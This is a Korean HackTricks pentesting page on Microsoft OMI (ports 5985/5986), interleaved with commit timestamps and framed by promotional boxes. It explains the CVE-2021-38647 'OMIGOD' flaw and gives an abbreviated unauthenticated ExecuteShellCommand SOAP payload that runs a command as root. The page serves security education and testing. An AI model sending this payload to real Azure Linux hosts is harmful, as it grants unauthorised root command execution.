2024-02-10 21:30:13 +00:00
# 5985,5986 - OMI Pentesting
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 21:30:13 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > 를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요< strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
* **사이버 보안 회사**에서 일하시나요? **회사를 HackTricks에서 광고**하거나 **PEASS의 최신 버전에 액세스**하거나 HackTricks를 **PDF로 다운로드**하고 싶으신가요? [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)를 확인해보세요!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견해보세요. 독점적인 [**NFT** ](https://opensea.io/collection/the-peass-family ) 컬렉션입니다.
* [**공식 PEASS & HackTricks 스웨그** ](https://peass.creator-spring.com )를 얻으세요.
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **참여**하거나 **Twitter**에서 저를 **팔로우**하세요 🐦[** @carlospolopm **](https://twitter.com/hacktricks_live)**.**
* **[hacktricks repo](https://github.com/carlospolop/hacktricks)와 [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**에 PR을 제출하여 여러분의 해킹 기법을 공유해주세요.
2022-04-28 16:01:33 +00:00
< / details >
2024-02-10 21:30:13 +00:00
### **기본 정보**
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
**OMI**는 Microsoft에서 제공하는 ** [오픈 소스 ](https://github.com/microsoft/omi )** 도구로, 원격 구성 관리를 위해 설계되었습니다. 특히 다음과 같은 서비스를 사용하는 Azure의 Linux 서버에 중요합니다:
2022-02-02 14:36:35 +00:00
2024-02-08 21:36:35 +00:00
- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
이러한 서비스가 활성화되면 프로세스 `omiengine` 이 root로 모든 인터페이스에서 수신 대기합니다.
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
사용되는 **기본 포트**는 **5985** (http)와 **5986** (https)입니다.
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
### **[CVE-2021-38647 취약점](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
2021년 9월 16일에 관찰된 바에 따르면, 언급된 서비스를 사용하는 Azure에 배포된 Linux 서버는 취약한 OMI 버전으로 인해 취약합니다. 이 취약점은 OMI 서버가 인증 헤더를 필요로하지 않는 `/wsman` 엔드포인트를 통해 메시지를 처리할 때 발생하며, 클라이언트를 잘못 인증합니다.
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
공격자는 인증 헤더 없이 "ExecuteShellCommand" SOAP 페이로드를 보내어 서버가 root 권한으로 명령을 실행하도록 유도할 수 있습니다.
2022-02-02 14:36:35 +00:00
```xml
< s:Envelope xmlns:s = "http://www.w3.org/2003/05/soap-envelope" xmlns:a = "http://schemas.xmlsoap.org/ws/2004/08/addressing"
2024-02-10 21:30:13 +00:00
...
< s:Body >
< p:ExecuteShellCommand_INPUT xmlns:p = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem" >
< p:command > id< / p:command >
< p:timeout > 0< / p:timeout >
< / p:ExecuteShellCommand_INPUT >
< / s:Body >
2022-02-02 14:36:35 +00:00
< / s:Envelope >
```
2024-02-10 21:30:13 +00:00
이 CVE에 대한 자세한 정보는 ** [여기 ](https://github.com/horizon3ai/CVE-2021-38647 )**를 확인하세요.
2022-02-02 14:36:35 +00:00
2024-02-10 21:30:13 +00:00
## 참고 자료
2022-02-02 14:36:35 +00:00
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ ](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ )
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/ ](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/ )
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 21:30:13 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > 를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요< strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
* **사이버 보안 회사**에서 일하시나요? **회사를 HackTricks에서 광고**하거나 **PEASS의 최신 버전에 액세스**하거나 **HackTricks를 PDF로 다운로드**하고 싶으신가요? [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요. 독점적인 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션입니다.
* [**공식 PEASS & HackTricks 스웨그** ](https://peass.creator-spring.com )를 얻으세요.
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **참여**하거나 **Twitter**에서 저를 **팔로우**하세요 🐦[** @carlospolopm **](https://twitter.com/hacktricks_live)**.**
* **[hacktricks repo](https://github.com/carlospolop/hacktricks)와 [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.
2022-04-28 16:01:33 +00:00
< / details >